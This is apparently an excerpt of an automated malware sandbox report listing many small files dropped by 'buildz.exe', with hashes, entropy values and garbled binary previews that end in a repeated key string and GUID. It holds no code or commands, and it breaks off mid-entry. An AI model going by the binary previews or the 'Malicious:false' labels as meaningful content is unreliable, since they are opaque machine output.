                        SSDEEP:12:u/nuRgYgs7EAnKzdsNlGPMsZDaEv1kBmilNU0jDkLKOWr3lGqIC3//26Gcii9a:u/uGYgvAncuHMtNkBHlNUPK5r34qIC3I
                        MD5:7E64BE689655645337C73643C9EF938F
                        SHA1:277E3D04AB907D6FBE5B7D9808BF14689D64CFC1
                        SHA-256:B74C9E2FC8F64E12F41321B1AA3ADAE8BF985F12A4E327BD7137CFE664E4D06D
                        SHA-512:29B7376D98DA8C0A35B3DF7EE05BE56328E93EF1EAD8F6B8E5F6FB5916BB12E3DEE3C7D8E7D3D0CCA5031B22B3633601C9551F490EF5FA59F2785BB9D5FDB43E
                        Malicious:false
                        Preview:<?xml?....6r..cBx.....J..'...~...$.c~J.mm.v,...l.+.0.I1p..:.[.w$..a.}.f`..%.z.YA.E.>6ED...P.3p.....b...-7.h.\.!..i....+.Z..^s.2}}.I.Z.f.<t|h?.ue.TZ..n..0.,..r..=....}.=....ic....E...V{.H.QbI(R.(.?.*..R%..-_#...Zy.6.*V..^.-H04..2.ep.8.$"..O.c..%.;..y...M.[....7..{..F..Q.%../x.4.&Q.....nm...x..s.>.o`'..O.[6._.!....s.k....S1..... ;.:...A...4..N'..D..(O!....Z...E.....K..l.)..Q..8..L.Z.<.J|..d\....l.....ZL....&b...l...]...3*.W:`..*..9y.".......V........".{.W.m....P-.f.m.....Z%.yump..+....z..-KM...NmQsJ.<*......~.R.3..r.P>..:..Y.<z.qs....i.....19.SZ.td.e%..$.w..N.9..S..xD.. 3..[...,..y_0.ON.....B.z...R..6k.r.J....u......r....e`G.......1....".X...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):819
                        Entropy (8bit):7.712332459282998
                        Encrypted:false
                        SSDEEP:24:WOZkwmkLe0eGxh1DEwLFehjkuyNhghGbD:ruvnGzLFFuyPeUD
                        MD5:7659940125E85251BB0E5D16EAFB1601
                        SHA1:9827E69664461848787A63CD6D3828225649A2EE
                        SHA-256:4D667E26F38745CFE96FE3E32A8D56836544688B2ADE278199CAED9B6E25CA34
                        SHA-512:E2472EAE89DEEC14506FB8DF2299F160382C18DD91FFC0682F437DBAD93815FDD5472C450F7836B4D01C61B9ECEB2C1C129CBE24958F3B3FA66785D762337325
                        Malicious:false
                        Preview:<?xml.....4mG5...p._4.+u...c W.*.F...p....%b..R.i_..n...jc.o..G...W..Dt...O%....tNA...a..x..B...#.JC.....Y.;.{..4...p.....T...6....-*.ZD....Rg...........(...Z...FD.<s.;2d.a.H..."gM|..L.f.....ya..v...-<..+TK.>..0}..v...1.H;..\..2..p.<._<..|z.#...Y..FX.RI.....CN..I.".?..2/..1M8...p.."+.P...DM..%*.:..Or...e...$C..q....^g*.._&......".@$....M& =^..b..@'<F|.Z.-5..<...U.S...{&.(..-.Ds.....e..z...i..d.`4..J.....h...[..I.7.....#..v..>U.].pB`..v.....c.Z.@..X..%.Pp.....z.@_.M...i...G....;.fx.og9.`....&.D@..W.....d".{G;pj~...@..u..EB.."......D....Cg...T.U.Y...7._...g.S..;..^O.....*/....7....&?.J........}Uc7...cq..H...H.VSY....<g......m...h......)..<z...$.......m.+...'."Eg-....:|".D}.. .....".9kj.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):740
                        Entropy (8bit):7.69217204667049
                        Encrypted:false
                        SSDEEP:12:m3UZlGDTixvSllZpmhnFCMrUGjzvi+7sglCvXlrsPiKPjCkOwjnQKaVfmk+tj3sP:m6lGDTix6LZpWFhrfjzi+7FlKCPTPF7o
                        MD5:7CCD828F782272E18625792E3A81715A
                        SHA1:A28F7F3BA1F2DBB2F8BE787080F6FC0A2BE0B1E8
                        SHA-256:C47E722B5B1C2E0F5687348B731B5A3113161DA45F9BFB2BDC4EDA4333120392
                        SHA-512:FF19ED3C777659975DE54A84608C0DAAF2EB355E729ACBA0F15A34F57CC9B0BE7A77987F406A99914DDB9EF81E1D020AAAB8E30E22232EA80B051E1ADA5EE496
                        Malicious:false
                        Preview:<?xml.l.b...aF7.../..........r.Xe.".v.m.......u..b.1.y..Q..T....R.....N|).n....<.[.LD.t..=..u1.o...U...7.......A1...=?...<z.../6.....9....2m...(U..}+.i%...T..r...dj.Zf..1x.....Wk_M."4.....L..R.M<..>l...Qm..............l.'.rf..8......oV..]'w4^.{..v..I.v..t...$...k..D1s..j.S`..,X..,..\...=.a....C#w!.%..$~..\j.T..............pn=..Y....O......._.....:hn.}...gULU.{....2>.p......|......,=..*.[7...o.....!..C..R.YY!f....)~.-)......4>.....N...g.......vM....,b%...3#.......-.02s.<&.u...^..I.W7..:.M.'....a:.#4..l.>'M..3..6.5.(..Rr.X.X![..ta......c........{.3t/\.......LW.#......O.O,..b.M..TTjq....ts(|B...?..x..-..}...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):802
                        Entropy (8bit):7.685489615291347
                        Encrypted:false
                        SSDEEP:12:yBEoo4QxkZn+7E9/+ozOnmzm4MI5YSwniRTn28vWKSrKOg5ni2V4iNJ6kc26GciD:wqp2+I9WlBa5YSW8OKS7g5n/l/6DGbD
                        MD5:B1C79809FFA421F406B910F0E3D044B4
                        SHA1:CA1BE04B6D3E05AD0A3FFBE78AA78558ABAF4B7C
                        SHA-256:26138003E2DDF57E9E6EE1DBD3B8A48665697E6F5A2C90B96FB8220A57B2473F
                        SHA-512:0A7975DD45CE0064F7DD9321B581CC1BC85802A91C588C8CACF16F200AAE1DA0260ACEE3C79771646A9FD3B89893DCF7C62D0040E101FDE4B7752876192D30C8
                        Malicious:false
                        Preview:<?xmlb......t`...rN..7&Z.`.@..j....K7n.{\..O..q-}...].XIiDd.D...H.....Yr_.u...A.8Q...>o.......G.....)...............T..H...A.p5i.k6..MWx...0WY. ..........#..kw8.......[_...H....a.].C.1~P.s!9ng,8.......+..-..A..D|Mqlto....j.`.>#T.....$,.7.2..z.i..t4...^..._O....t`......&..:.P.5..?.......4.u..z.......GJ2...it.......~AZ.7..I.2u-g.P.r...w....4Q. .+.F.r...LC....J..B.6..Q~/.Y..>...p..UZ......=....w...O....5.!G?Y<mD.3.G........]._O..`..3.....BZX.T.VU...?G.....(+AWJ..H.d-..W.k3.%bY...P.o.,3.!~....|...(4.N[.T8..{...c^..+....xi..U7.sR...7....T..]rO...e....|M.nR3...G:....TR...@|..*.....@.#.8...2.....j_...q.QY..N.x.AT....Ak..X..o#..,.u._.....k.f3...<...Vw...eD.r.+...=.?...._7Q....E....k.#..t..@i.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.649304541488307
                        Encrypted:false
                        SSDEEP:12:g7vGU/zJB0lEqsM65Ph7t78Vi3ut28xp92eWUFTf0M1VGS/GsRy9U6klqKlJV26A:g7vGU/zVMmHki3uEP2TsiGSw9VYqKlJW
                        MD5:1F34B7E832C481960750F93EEF2BCF17
                        SHA1:99F3314247244B7BEA5A96D8E7A419D4D0D32B9A
                        SHA-256:3007B33BDE3FBA2C2330AF9C654BA78117591D5ACCE6F45D230C97E03D515505
                        SHA-512:3EEEA16B42BC21F8A5C9DF8FC4D1E32384411B69F359B5A9F00B14AAEF585BA1E3348107F1DA83572AA2B9395A8247DDC757ABC6CC5A5E4588BF6937C3D0295D
                        Malicious:false
                        Preview:<?xml...g..dl.....P......2...:..!....i!D...qW..p}C ..."5z..D.j}.K.N... ....6...Y..H..i.DV........H..:.J...!.nL......@.....w[...|.23.H..%.?..6..1..A.?......._...`2*T.^.o."..FDMV.-*.u@6.8..7....pYv.6...B......J..R#.X...=B.[5A...._...."A>..,....YQ...np?$xn.lO'..\x...4...]..".q.H._x...A3F..l.Ne."R1.1....u..j.H:..-.U>...y...,..{J]X.x`1,M\...%.Vu...,...i......sC....V.5.c.....x.6....lhg.....;.........p..b.NY..6N..7%..O`;.@..... n........!8..[;..9.,.....R.[......z.D.y..Au#..\.....x.....0.....T..0>Lxi]T.v...#f.|sV!...,..t... t...dF5m..:.....O..4.\...c...%..'v..l....3M.I..g.l8c.Y...."....v......8.......H...w.'....../L..w...OG+.S.......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):810
                        Entropy (8bit):7.688180612256365
                        Encrypted:false
                        SSDEEP:24:CR3Md6d56KJIRMt1FPx9M0Pj4CP7SfTOzmGbD:Ij76KJrxckPPAwmUD
                        MD5:62DF7A1891EC6699FBE89E474D049415
                        SHA1:4AD910DA2BD82E8FB73B565B8E06E67CA78EEF36
                        SHA-256:C993ADA7ED68610455AE8C1C2DF431F03F0325A82044356082570B92533498CC
                        SHA-512:05386793892CC403F0EB49DF179418B6BA283A72BD821EF0CFBA2DCB32E94B10612143B93656336B39702527B1AC600125FD8FBDBF92FFAD6C8314ADAF4AA3B2
                        Malicious:false
                        Preview:<?xmlZ..3$.....<...........K..A.......$..}._.=..Y.:&^8...}KP,0..O..db....I..9...Ka...R...9...5e.l.e.G..I.B......&....F0..0[....+.r...<..6.....@Zs.X..r......$.T.B4.@.GJB..&t....H..<.KX..P.B1..-.W|...\\.c.Y...E.,..z^.6?"......K.l....~..S....I.X,..T..NL....... V...x......\.5.FxP.,w......~.%=..*....r3:.H({8O..m..9..j.:'...L.B.....b!y....&.....H\..!".a`.|B.?...N-:5.....=.r.IK.Z.:......U.VC...(c.X5$N.M...<S..E.y.......!.<....W.-.%.<t5e.).\h$....l.5.....p.Xl%[8...0.+..-..`...$....&.}S/..><.H=8.)...W..>......:2*...N.Cx.....P...}w.9.^...4.....a.t...d....".u..&.=.../....R..lq.....v.Q.q@.U...=d...k......^.~.:.[...r.X...B|t...H. l..o..1.N..9x..7~.x.X..K..A.g3..h..M*z.W>+..-&.S.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):797
                        Entropy (8bit):7.721556551502195
                        Encrypted:false
                        SSDEEP:12:r2ScH4p+FJgiiQARhV4Db/RVzly9DV5zA+1j1gPUECVWZ0b0JPyB6wrGsI26GciD:aS4kC6NhV4D16dF1gPUE5rl26SGRGbD
                        MD5:1FF7930300E5782B6F1D50349C5A5EA4
                        SHA1:09D248B2A10E166D843BCECBD800D7C261AFD3D4
                        SHA-256:A689B1B104CA0E520C3E7235FD00D6D48E051451F168A77E3B58482346AF3BDF
                        SHA-512:36B8E6A9578109F43CA43FCFEC990892E92216AEFD887A8C835398D077134D93161F3609D2468FC1C9AC6E57F52F943A8758ACFBB2DF418C17A13B1E4732BB18
                        Malicious:false
                        Preview:<?xml..9.u.q.T:..."[..3..........:."U..2. .$.....:b.D./@t.`..(..@.L.%.H....e.C9.._..h.=..x..0.@pXR.p....V.J.Z.@'.......%Xm."......m..%'j.!&m..6..Q....fu......HP.?.....jM.S.G0...k6.+...F....>RO..F.c.......w.._..:..)......&.R...^.|../.&.AO`...k.\..X..w.~P..%..4.D>...s.B...36.......6.../z.fyh1.r.v.{.P.`.....Z....../.o.5u...>S.Ciq....e43....H.=Il.....d..eR..N.;B..;/. }.p.n...6.U..rE2.J.h..]..&..n.>V.e...F4.H.V.G...MRs8e.`.ZE.L1ft.N7..H.J/z......!...[.T.t.<.8.,..r......!.ws....m..l.....}.G......u.;.D.s.<.e.g~..0cT.j.Cm|s..@...Y.3u;p.....u.c.....r..].;...b.E~...k.....y.V.0*2;F..<...#'...gL.9[*..r0.>L....~<....$........{..'|.@f..:".+.S.iY{.c.!.>......d..z......Y..8.b........,..|.....lEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):827
                        Entropy (8bit):7.724484896052978
                        Encrypted:false
                        SSDEEP:24:BTW23Uqf5KVU8+Dii2eN+je/zWKLYhDUxZjWUYGbD:BTW23T5KC8c2w+jgmDUxgUYUD
                        MD5:C337D9357CAF4FC6D5C4BEBE6B97F14D
                        SHA1:88745A78CD4022B94BD4BEEF34CAD357258B9868
                        SHA-256:B5D072DF8E0AEEE9144612A19E7BC87BCE45D7DA712C3125D096B8856BCDF27D
                        SHA-512:D79F4EE25E707A7F90CF8F2C808B457FF0823951FCF2BAF3BF87251BC972E66C1C264DD71304F9558DF31A368269276DF1004E286027FA7B4F0891B2A588BB90
                        Malicious:false
                        Preview:<?xml..@/...v..>..i...._.C.....D...;..#xcBl.\....h.....R(.VN...O.D.aP..kw.L=)...-E.#m7..6b+....x.)...Wc|....LbFN...........L...".Cz.iOzWc..x...2/.......Ok .....}.~........ty.z.......Bd....l..C2.s.. ..1.[}3..H.pY.c;.+..`.D.pxTq..3._...8X.n#.....&.bP...]v...[.9.5.s[..3.i9..8\..["...n.`.......v*"B.....:#..d.-..Y4.Z.......j..sK..2.u^h..g.......s......5..g......RJB......@.m.w..V..5x.V.."...J.@u.V..S.=F...#.R>g.(.a..........:...4}i.P..0.1....j....L...:w0.....,{....D.@!....%@. .9Td..e.r..#L..b.~j(..vT....$.$!+....... ..2..X...<..~"#.....O.?I..%..T.c..(T../Z..&.rt}.R!...Sy.?........S.4H....$.x.Cm..He......K.]*.....F...Y..O@L=+.0.y.>...........x.....".Z.l[.CF=N....+j....8N}..{{..vYp.]..,......Q.....7..GE.r..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.706034488155877
                        Encrypted:false
                        SSDEEP:12:k6uC/TYT0apb0L8i+pXUui63JFgOOyBhxBqOZ0LG/9eNSgO/uiFpjN26Gcii9a:9f0T0H+pXUur3BhKe/ItO1XJGbD
                        MD5:72BC45B9A522E4B8F12E1CCF092801D7
                        SHA1:1D746D3E517CBEE24BE6B5B7D4FFF4952A533E00
                        SHA-256:5ADE0A993475D63C5C717C1E2960D8FCB08465E107A5A6FA13078D77771F519E
                        SHA-512:9C0446BB5B12F2698337E59F1D500C16AACB17729E6CFF8D94CC10C7D8612E33F7F8488D85A2D8DA3D277D3541DA12A6ADB157DA62DF227BE98593B347C22CD3
                        Malicious:false
                        Preview:<?xml:`.sfZ...@....d...F..,q;g..kir4....q5x..\.....h...Q7.O.%...N/.!.. B..../q.../...>W.?....X..l.X..)ZU.i.R.K:...I...T..+.@..O`....8..|.....E"....r@.2.>..2^%5..ie>..j.1.2O*.1..vV%...W..o.8.,.....YG.b^..E..O.(&@6V."u..h..9.).K~w...XzW.&.._....P.fs..m".....-...l..G..lb.&'.w9..qM......Ww.R..B..<.<u..ZW....e.zYq'$H...C6}...&...q=j.iy.8..u}v.lY]..].R}.^BZ.s.....B.../..K.E..h.a..gK..X..h..*.a. 'uj.....Rp.s............>..z.....S...Y..+..2..@..2..WE..o.c..IBt$N..x...rG.).+..F'.+....HCF.{C.Q0.?..K...t..9..ThW.M.Yf..$....?.J .O.A......z?T.....j`E... ............n....o..8&.'..v....PX.^...W-QH.,\.0..G..Id.(G...A........Q....s.3....x..........C........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.740156467258672
                        Encrypted:false
                        SSDEEP:24:3BwcyQ2YIV60OF8K99NVKYejeLw1Lm0nRzJfkGbD:3pyQ2Y70OS+9Dk/kUD
                        MD5:5320F413D71CBD74AE653575D27C192D
                        SHA1:33A444F9FC1FCB9F456C99B4372B706F2EC4F0E7
                        SHA-256:60C30CE33D032B087F30269532522E93B2005121B265B487E1D0A731C81749F9
                        SHA-512:333C36058A9FEFD0E0D91DCECAA35034E9DDC93A807E1AC1CFBF19F21A4D6ACF694005D7C9D41CF07FB3BE9BE2EB27AFA2286834543FEB04CAFF4CC2D63BD9FF
                        Malicious:false
                        Preview:<?xml.8iA.......dT.{&.......5..$GC.T...}=......W.R..k...a0.`.}P.bM.2..Q.J.~j..ZR.\..T.'e..Q...{.x.A.p.?....qz....-....\j.Pri[.......G-.........&....o.3)DJ.?.A...q.M5..tP.y.5s.z#?..|.b....70..|g...).....?U..^}U..:.....l.L..4...c d.P.&..q?.w.k...P...U.$~E.. ..P=.....t.%...<q..9..$U./Xc.........J.L-XZ.O../...:..."..A...%...wurc....!QV.&..;F.\ .t..|...sf.V..Q..>.]........[....v.-.5".....6..e.v'.....@.|n.C.U..};....%.H...].L..n^Q.:..&nX..'........yhc.#.]J...{.Z)?8..U-Z.WZ....L:...>...f1V..n..~..=....6. ...fr...T..w+t,d..r..L[....2F..2pQ\D>a.....l.cho.....t.K~1S.V......%@..3.5.e:W...$.M.a5V..DX$.3r.Nk.+.c...rA.7O.....[.S..g.-...5Pq).1...X...e?.,S.%.oE..x(..aX..Q...-z{....I.H.Y\b.#o..Q.$.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):737
                        Entropy (8bit):7.648532183868612
                        Encrypted:false
                        SSDEEP:12:XsQJ40FWubEk4BHj8w6FRRguY9MdwwPZsMhsnvShGOk6p7lCTlm8EX26Gcii9a:cQJ4ebEjD6FAuvdwssMhKw7pCPqGbD
                        MD5:F695B2A2D040E8283A74C29C273248F8
                        SHA1:82ECD2F54F8F698DD369E89BEEE7CD04D237E99B
                        SHA-256:44AE5499E6438D99CF98610973994C1418B7A401FB5E23E7C728F76E054CF9D9
                        SHA-512:27D7DF2B7EA031B5FB794BEC4EA7DFC399C6CC2BB24C1300ACC684F88B50942FA00D98FC7FCF23B1376EFFB3CED81FE8C877898337EEFFCFE8B79D86934F8FE2
                        Malicious:false
                        Preview:<?xmlvhg(\gA'....-...$2Y.Z%....4J.>"}...Y......(...q...k.?}.t..(.g.NW..3.;.m.% ........,GMKVU..Z...~..g.x.1......l.GC.!O..:.6-.....E...C.A....K..f.z..'.<.v./xX]..V..`;Z....B........}l..1.?...=.g.'.@44.m..?..l....h...@p.h.]C!.V........r=...:$..)(.KR..2...D..3.W..f....g*,...9.(...:n.....hm..XPP.Hry.y]N.]..6'g...=G.L^..s.P4...4T>.<K..RJQ``..2...K.{.T..._.XE.(.8.........M...a...B...%.G.VC(...X.....i.j.b'.Qt~..a......R.......|..X.7..Un.Y(/*`=..D.Cz..li.....5#...!..Z.g.(..X.>s...r....p..07....!......^. .~.m.V..K.?...3il.K..|\.f...N.n..e.....|..:f}..r.=..%.pU#dIY..H;.N.J.i?"....S........-aa.9........!.....}^...u...r.O.......n.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.711669223642531
                        Encrypted:false
                        SSDEEP:12:TfRsVqaa0NrFmP3Mkqsnlr1BH+XtRcWA1Gth47gNICAu6u+tvKR7zvoSACavyc2b:TfRssp1nlWXqw48su6FYtDA7yuGbD
                        MD5:35C8A857A52AE2DFDF5A9439C17010CA
                        SHA1:2A0C7C0679F841DB624CB9C595CBB76A1E0E90E4
                        SHA-256:F56FD76DA593C7AC5659E5163FF9F3B6388EF5FC079F3F91113D37A7E8F48BE2
                        SHA-512:065D361ACEA144217BD832F2236D17C54DC4CE582EA85AB2D377DC4E7EB7FBC98345F6C13FEB64B9AB6F24FFE96FE08C25317D10588C0FF6F515BA4CDC2D74D5
                        Malicious:false
                        Preview:<?xml......d.a...>..b..^f.....[.....p...b&..|}P1..."..l....!..^..L..7...6.We.....?.."....9.[..6h...k,.m.K....._..'q..c.R..$....G.J..R.....l..Q..>l..6...-Y."~a.....v.....l.....0.Cf..c'k='...K...h/..<A ...'+H..t...i%.a7....?..@1Y{.......S.H.\5U....P.M.K.{./*..0R...7w.E.".JS..).K'.~K.JR....<@..Yd..j<39N,i.:.a....Yb8..../NMs..U.P.3.VjZ..uid.u".~Ok....,.d......(.<6.`ZW...S~...+.i....._......j.{gq.....0.~..4E..l'Z>.@..\..`.....X.Z.....5|.y.....c.8./...ea...f...y6.]<...m.n&DA..S*....|.....x5.C.>....M......q.d*..E.y...~...r...NPQ6{.[:.K.!..2-.."..81z....^.`.{.tC..>Xb.DX...$...9p.../.?....S.'.-...Cot_...W.....=...*..sT-E...r.H.W..I+5U..=..0....p..m...Z>.....'..S...s...w0......{@.t.....A..&..u.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):761
                        Entropy (8bit):7.695097739791746
                        Encrypted:false
                        SSDEEP:12:UKDNOeuP4OsDmGVeYvdcNznAFKQdtTsAkIlbpIwTY6q35Fih5nUKJvRyF26Gciik:UKUbtGAmeznAFLwV+b+iXQGbD
                        MD5:4E7CBC6C56C66A2B80C993B8CAD4B11D
                        SHA1:EBC1D9E1A49148882A50CC55AAA4240A8A111F85
                        SHA-256:409F519CA642506CE1423215FB0311FAB8FD359E2461B04A50B7F8934242A0D0
                        SHA-512:C9D88E24AB9FE7E35762740BFBD6EAB91E41A448F5B55404C180BB1D1B39B6535B08F1769320611C7A07FFBBA1808E8B56C9F93B996C9F7661BCBD826427A365
                        Malicious:false
                        Preview:<?xmlsZ.......?*..A.~(..[Wd..^.7....R......d..3qm..M.../....J...uztUb.. .9.4H..lK.....>D........[.>.:..5:.9I..kA..4.RSf..v...S*...QE..Alo.G....wF..........r..;..y2.E.=...]hs].b.....,..:.p70.b{=|.....UQ5../........^...q..mX..#.x.d|v......P.sC.Zf.K.>.,G..*.R.^.,+.bv....7.l..n7"..;....}....=.i.*........O..v|.....>....G1RA.He...M.....g..-..i.....=.......K.1).F......_.G."X....T.....c.}m..........`E0..7q.B.^....I...3..:;gi\l).....qF.;g...3m+...>kf.1E;...B...D..2...5+.....FB.A.....p.^V.....QqB.jU8Z...{).W.....m~....Ok.*...P..h..@. po?)";.I.aW.....G.I.{k$S].j..}=...wa .6.t...MSJJ~..&..#....;.C..J:GUifa.W..5...$.l.P..Y...1......u.......s.|..).EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):832
                        Entropy (8bit):7.718976845862359
                        Encrypted:false
                        SSDEEP:12:MXhvBoWoznHmjxHBG2NsumLHcszb2cMM7ilOV4/LCwNkirnJN029N//26Gcii9a:8TK8HE2Wssf2cSbNrE27/HGbD
                        MD5:3E5FDCAC8C227186FC1198FCAC4A4B98
                        SHA1:3079B5AF83DBA83C1364D5242BB13E7D7EBABB33
                        SHA-256:8C5548F7FAA6276BE225511BEB3E0C9BEC2BE5DC4F4B38CADDFF383BF4B88B5C
                        SHA-512:8EBF9BB7C637D151070B1C9EDFA0B3A8DEBB97D1F220D451C342F47AA471265B93220CEF6F7D6D7AFC48F985F260F67F0047AED27C8AC80369B19CDC90CADE96
                        Malicious:false
                        Preview:<?xml1..{,..J.<...7.`0..x.r.s!...K..-.O..._<._..X<......p......S.\.@.%.!kk.........s..T2.S<sp%T$.(A^/.x../1..X.'..2c.%....F.8..`Q.bp...a......A.O.j.j.....6..nLP..,.e.....C.f.....w..(&P....#y.R3.c$.N.#`~..-iPw;.....pQb..uq..?...-..n.i.=C..C.;.NL..A.1.~.#....Pue.T..N...5..]_..".9.s.1.x.W.}3.._.wPM.7k..2).V;l^.M../....D..C...?.. o...1.T.^.EU.\\6.&..du.}o.E?fav}O.K...iw_...S.....lFmJ.........5.j....}..Z....:W"]....e.'w..k...&h.7~@.$B.I.F..25r;k..=..x...V..`......jU.;/'F.<.$f.h...!2.....P.MT.b..7.V...{.6...4.siP..a....Ga.U>..t....n..5.....4k..l. ..6..t.f.5.t]...4.9....b.n.DCU.ic......EZ.C....=.c...Bc..Q/.Y..V.D.2.X.[W.s..Ah.e..Y..9.....G.r...B#..y...."..W"u...{.>!.{.C..Z.\}.c......'np..k..].........@..&..cn.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.7004384353364195
                        Encrypted:false
                        SSDEEP:12:xfGFgjXLpGOUscDeAl+T10Rntcr+aDUAwJxbV37+ANnTLhhfD59x2StVAAE/26GX:xeFgjXLpLUscqMur+aDqTR37LzDLVtEg
                        MD5:B1A3607F0E08D955D94C33E7CD332356
                        SHA1:83EFD906036F1D82CCB04806DFFC436B9A94FA56
                        SHA-256:F3309843BB56D87D9F376CE38A03C82F63C886C982096F65BE78D5E0F7219EDD
                        SHA-512:EEDF1EA7AB762160340618CF755A8E60F99EB5D16F480612EA73989CC9BBD5E32BD47C40C902C1030B91C03A14564BC724779FBE3D497A7A81B9C25597E28ADA
                        Malicious:false
                        Preview:<?xml.:........(.k..eW.N6.A.........@8......c.YD4...:.EE.....].t.xW..;.wi......|".......0"?e._.6.q[....^.g..T.. L..;uL#2..I.=6..e..J0...`L8@..{SD.....l.E.s.0.RbS=.M....t+.A.....s.c^..q..l..J..cx....nY!.k.&LDW.....N]...).'&.:%..Z......%.X\..P}.. .... Y.o'g.g....^y.';.<....~.aFg.I_....+*.....e.p&-a=....._......Re+......^q'....*....`..v.2S...H.G;..DR_.b....[@.g..#1....c.....O..^h..1......Mr8.1$....ce..F.U..U...r..R%...\=v.....=.UR..c/N$.......1...Q..a#s...A..,...T......m.h./....6z......'...I..qIvP.z...w`(A...*......H.w:..@4..CW....m..d.c..\.9........6.<>.WymS..t........!...n]W.x....d....?.....:.._.'.....'....Z.../{|Y.N.....,..bEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):804
                        Entropy (8bit):7.697910253743905
                        Encrypted:false
                        SSDEEP:24:b0OJ8RgoSn92uXYOERNsUMAtMDfwOILGbD:Ae8ioCpo323VDIOaUD
                        MD5:4486BFFC90B087F967B09D84210493CF
                        SHA1:4584B997FFC0B7C8E9F9542F99A5CA3EB251A1CF
                        SHA-256:A1A382304F2378A589C049F4A711D60A67C49A29792FD4F65225D241B6F50C48
                        SHA-512:541AE151B5973D09EB313C3C9D7138C1F2320B4B5EB78517A793A4685D33491C087270C72D09CD3C05E78702CF2E888C9189806080991078F2A509318C276EBC
                        Malicious:false
                        Preview:<?xml....f..zO.R{Ns...[5/,+.y.w..C...O-r.4.....e...:H..J...J..$1...K.Z.{H....%.l..0..v=..*c.|.B....?%.\.."&7S5..9..l/..W.....D...._4{..P..:...i.m....?@.<................m".]..\+E6..N.D.s|.X.....>..K..w......@4.W*v.)....k......U(|...qR..};...n.. .......=k.Oeo.^.-."....`e.....g%-.....e.9s...'...sW?..T(.v......{.....l@.n..T..r2../.N@..J}Su.P_.+..'.9$\.....~.).f...O....7........k,.C.....pr...v...TX.%......|..,.T5.q6..c..T?.=..._5.}\.\.<..IZ_tf.w..L...A.<g.@$...ty{0........}.......6..y..#.7.5E@).....b...g...".8.....7...*.e..O.mc.[.8.u&(o....ZA.[)..aH..srO.wG.\......=O...7...Y.+b..X.- R....'......(2.."...w.i.Y....i...9..".G.!..&T..y.F. .a..%.......n....08.2_.fK`I...w.W......z..KD. ..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.661888999322432
                        Encrypted:false
                        SSDEEP:12:OIa5+qyD+z2N8Mwrd1pCRWiTwWz4gg09rgw6vsHIpXUX461+g0mpGBjz26Gcii9a:OIIK2dDCRLTh57rksHUXUX4xAGBj7GbD
                        MD5:B87BD8CE2A06B16AFE53C02983DC40CB
                        SHA1:4CBF5A3C22C0A9E6B4E23131964753AE1BACCF12
                        SHA-256:F63C4E8F07F7A3836DECB2FD4C4AEA3A4506A169261B0EE7D0882EE6711D3C02
